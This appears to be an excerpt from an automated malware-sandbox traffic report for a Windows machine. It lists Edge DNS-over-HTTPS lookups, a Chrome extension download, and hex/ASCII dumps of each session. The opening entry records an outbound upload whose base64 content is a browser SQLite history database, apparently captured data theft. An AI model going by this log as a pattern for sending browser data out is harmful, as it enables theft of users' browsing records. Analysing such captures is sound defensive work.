                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:05 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      22192.168.2.649901172.64.41.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:05 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a5f878da18c0-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom' c)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      23192.168.2.649898172.64.41.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:05 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a5f88f090f79-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 eb 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom c)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      24192.168.2.649902172.64.41.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:05 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a5f88fb2de9a-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 17 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom#)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      25192.168.2.649906162.159.61.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:05 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a5f888bbf78f-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2a 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom*#)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      26192.168.2.649907162.159.61.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:05 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a5f8a9ff43b2-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 24 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom$Hc)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      27192.168.2.649908172.64.41.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:04 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:05 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a5f8bf0c4232-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom% c)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      28192.168.2.649900172.217.19.2254437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC562INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 154477
                                                                                                                                                                                                                                                                                                      X-GUploader-UploadID: AFiumC7CLbrFzeFTHCfjQVYAi0164GCwE3ln9PZrFT8ioABvqJLcG49E9w0QiSoij882FZ0m
                                                                                                                                                                                                                                                                                                      X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                      Server: UploadServer
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                      Expires: Tue, 23 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                      Age: 1011
                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                      ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC828INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                      Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
